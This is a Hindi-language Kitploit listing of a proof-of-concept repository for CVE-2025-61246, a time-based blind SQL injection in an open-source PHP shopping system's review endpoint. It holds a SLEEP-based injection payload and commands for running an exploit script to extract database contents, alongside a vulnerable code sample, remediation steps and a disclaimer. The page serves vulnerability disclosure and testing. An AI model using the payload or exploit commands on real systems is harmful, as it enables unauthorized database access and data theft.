Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-61246 — CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP | Kitploit
उपकरण/GitHubGitHub/hackergovind/cve-2025-61246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-61246 - ऑनलाइन शॉपिंग सिस्टम में SQL इंजेक्शन भेद्यता

CVE Severity CVSS

अवलोकन

यह रिपॉजिटरी CVE-2025-61246 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो ऑनलाइन शॉपिंग सिस्टम PHP एप्लिकेशन में पाई गई एक गंभीर SQL इंजेक्शन भेद्यता है। यह भेद्यता एक अप्रमाणित हमलावर को समय-आधारित ब्लाइंड SQL इंजेक्शन के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।

भेद्यता विवरण

  • CVE ID: CVE-2025-61246
  • भेद्यता प्रकार: SQL इंजेक्शन (समय-आधारित ब्लाइंड)
  • प्रभावित घटक: /online-shopping-system-php-master/review_action.php
  • प्रभावित संस्करण: 1.0
  • भेद्य पैरामीटर: proId
  • हमला वेक्टर: नेटवर्क (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • गंभीरता: गंभीर (CVSS स्कोर: 9.8)
  • खोजकर्ता: Govind Pratap Singh

तकनीकी विवरण

भेद्यता review_action.php एंडपॉइंट में मौजूद है जहां proId पैरामीटर से उपयोगकर्ता द्वारा प्रदत्त इनपुट सीधे SQL क्वेरी में शामिल किया जाता है, बिना उचित स्वच्छता या पैरामीटरीकृत क्वेरी के। यह एक हमलावर को दुर्भावनापूर्ण SQL पेलोड इंजेक्ट करने की अनुमति देता है जो:

  • संवेदनशील डेटाबेस जानकारी निकालना
  • प्रमाणीकरण तंत्र को बायपास करना
  • डेटाबेस रिकॉर्ड को संशोधित या हटाना
  • प्रशासनिक संचालन निष्पादित करना

भेद्य कोड पैटर्न

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

हमले के वेक्टर

एक हमलावर इस भेद्यता का शोषण निम्नानुसार कर सकता है:

  1. /online-shopping-system-php-master/review_action.php पर एक तैयार POST अनुरोध भेजना
  2. proId पैरामीटर में एक दुर्भावनापूर्ण SQL पेलोड शामिल करना
  3. डेटा निकालने के लिए समय-आधारित ब्लाइंड SQL इंजेक्शन तकनीकों का उपयोग करना
  4. डेटाबेस तक अनधिकृत पहुंच प्राप्त करने के लिए भेद्यता का लाभ उठाना

उदाहरण पेलोड

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में शामिल हैं:

  1. स्वचालित शोषण स्क्रिप्ट (exploit.py) - भेद्यता का पता लगाने और शोषण करने के लिए Python स्क्रिप्ट
  2. मैन्युअल परीक्षण गाइड (MANUAL_TESTING.md) - मैन्युअल शोषण के लिए चरण-दर-चरण निर्देश
  3. भेद्य एप्लिकेशन सेटअप (docker-compose.yml) - सुरक्षित परीक्षण के लिए Docker वातावरण
  4. उपचार गाइड (REMEDIATION.md) - सुरक्षित कोडिंग प्रथाएं और पैच

स्थापना और उपयोग

पूर्वापेक्षाएँ

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

त्वरित शुरुआत

root@kitploit:~
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

उन्नत उपयोग

root@kitploit:~
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

प्रभाव

इस भेद्यता के सफल शोषण से निम्नलिखित परिणाम हो सकते हैं:

  • डेटा उल्लंघन: संवेदनशील उपयोगकर्ता जानकारी, क्रेडेंशियल्स और भुगतान डेटा का निष्कर्षण
  • प्रमाणीकरण बायपास: प्रशासनिक कार्यों तक अनधिकृत पहुंच
  • डेटा हेरफेर: महत्वपूर्ण डेटाबेस रिकॉर्ड का संशोधन या विलोपन
  • पूर्ण सिस्टम समझौता: कुछ कॉन्फ़िगरेशन में रिमोट कोड निष्पादन की संभावना

उपचार

तत्काल कार्रवाई

  1. इनपुट सत्यापन लागू करें: सभी उपयोगकर्ता-प्रदत्त डेटा के लिए सख्त इनपुट सत्यापन लागू करें
  2. पैरामीटरीकृत क्वेरी का उपयोग करें: डायनामिक SQL को तैयार स्टेटमेंट से बदलें
  3. WAF नियम लागू करें: SQL इंजेक्शन प्रयासों को अवरुद्ध करने के लिए वेब एप्लिकेशन फ़ायरवॉल नियम तैनात करें
  4. एप्लिकेशन अपडेट करें: नवीनतम सुरक्षा पैच लागू करें

सुरक्षित कोड उदाहरण

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

विस्तृत उपचार चरणों के लिए, REMEDIATION.md देखें।

संदर्भ

  • OWASP SQL इंजेक्शन
  • CWE-89: SQL इंजेक्शन

अस्वीकरण

⚠️ महत्वपूर्ण: यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लेखक

Govind Pratap Singh

  • GitHub: @hackergovind
  • ईमेल: [email protected]
  • मीडियम: https://medium.com/@govindsinghpratap123

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

आभार

  • MITRE CVE असाइनमेंट टीम
  • OWASP फाउंडेशन
  • सुरक्षा अनुसंधान समुदाय

जिम्मेदार प्रकटीकरण: यदि आप कोई सुरक्षा भेद्यता खोजते हैं, तो कृपया सार्वजनिक प्रकटीकरण से पहले विक्रेता को इसकी जिम्मेदारी से रिपोर्ट करें।

टूल डाउनलोड करें